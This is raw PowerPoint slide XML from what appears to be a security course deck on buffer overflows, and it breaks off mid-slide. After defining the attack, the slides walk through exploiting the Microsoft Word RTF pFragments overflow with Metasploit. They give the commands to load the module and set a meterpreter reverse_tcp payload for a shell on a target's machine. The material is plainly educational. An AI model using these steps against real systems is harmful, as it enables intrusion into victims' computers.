        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7472646" y="2725457"/>
            <a:ext cx="1770282" cy="2694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96068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114681" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Buffer Overflow </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2000" b="1"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9D3235CC-4A41-86D5-A750-A2EB685CD1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311441" y="4199370"/>
            <a:ext cx="10678026" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>In this recipe, we will concentrate on Microsoft Office, another widely used Windows application. The Office software suite's 2010 and 2007 iterations both include the RTF buffer overflow bug. The Microsoft Word RTF parser handling of the fragments shape attribute is vulnerable. Let's examine this exploit in further depth. I'm assuming that we already know something about our target, such as the fact that he has the Office bundle loaded on his computer. </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7C8F238-6A3B-61E7-351E-16CED8385FAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693670" y="3779560"/>
            <a:ext cx="3759362" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Microsoft Word RTF stack buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD5AF44-9C93-8F75-2B2A-64745CCDC84E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745959" y="535405"/>
            <a:ext cx="11310117" cy="1046440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffers are memory storage regions that temporarily hold data while it is being transferred from one location to another. A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage capacity of the memory buffer. As a result, the program attempting to write the  data to the buffer overwrites adjacent memory locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>For example, a buffer for log-in credentials may be designed to expect username and password inputs of 8 bytes, so if a transaction involves an input of 10 bytes (that is, 2 bytes more than expected the program may write the excess data past the buffer boundary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009117BA-FBC8-FA83-1963-C04AF786C0A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="1335174"/>
            <a:ext cx="2526654" cy="677108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Buffer Overflow Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54E8DDFD-58A7-657C-1DA1-DCB67E03EF7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745959" y="1797311"/>
            <a:ext cx="10584949" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Attackers use program memory overwriting to take advantage of buffer overflow vulnerabilities. by altering the program's execution path, this might cause reactions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>that corrupt files or reveal sensitive information. as an illustration an attacker may add more code and send fresh directives to the program to access IT services.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15EEA8B9-5F9A-0538-867B-59A3AA68A542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="2280415"/>
            <a:ext cx="3068469" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Types of Buffer Overflow Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FEB59F7-7BAE-75F5-76E3-FF0D57F79BCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693670" y="2619325"/>
            <a:ext cx="11362406" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack-based buffer overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>are more common, and leverage stack memory that only exists during the execution time of a function. the memory space allocated for a program </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>beyond memory used for current runtime operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap-based attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>are harder to carry out and involve flooding </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1F999A4-30B7-4892-435E-4A3C554E1DDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="3429000"/>
            <a:ext cx="1350050" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Examples  </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1FCDF1A-3F18-926E-B741-E576DFE1A22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745959" y="4764079"/>
            <a:ext cx="1309974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get Ready </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49B9BE3-4ED7-8E69-F1F8-3403C27E10F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311441" y="5091939"/>
            <a:ext cx="11679821" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>We will start with launching the msfconsole. The exploit we will be using in this recipe can be located at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>exploit/windows/fileformat/ms10_087_rtf_pfragments_bof </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>The payload we will be using is windows/meterpreter/reverse_tcp to get shell connectivity with the target machine</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="A picture containing shape&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB7C9BEA-CAD2-867A-A4C2-3A26B45A50A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="5698120"/>
            <a:ext cx="2053006" cy="1077829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3590395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51703" y="21132"/>
            <a:ext cx="2159566" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do Buffer Exploit </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41EC96AF-3B10-AF64-214C-383209774F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="186489" y="541421"/>
            <a:ext cx="11905247" cy="6031430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C67012D2-C3ED-5965-E37C-A5E5E0383857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415820" y="815119"/>
            <a:ext cx="11360360" cy="5339923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms10_087_rtf_pfragments_bof) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>payload =&gt; windows/meterpreter/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exploit(ms10_087_rtf_pfragments_bof) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name Current Setting Required Description</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---- --------------- -------- -----------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FILENAME msf.rtf yes The file name.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Payload options (windows/meterpreter/reverse_tcp):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Name Current Setting Required Description</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---- --------------- -------- -----------</a:t>
            </a:r>
            <a:br>
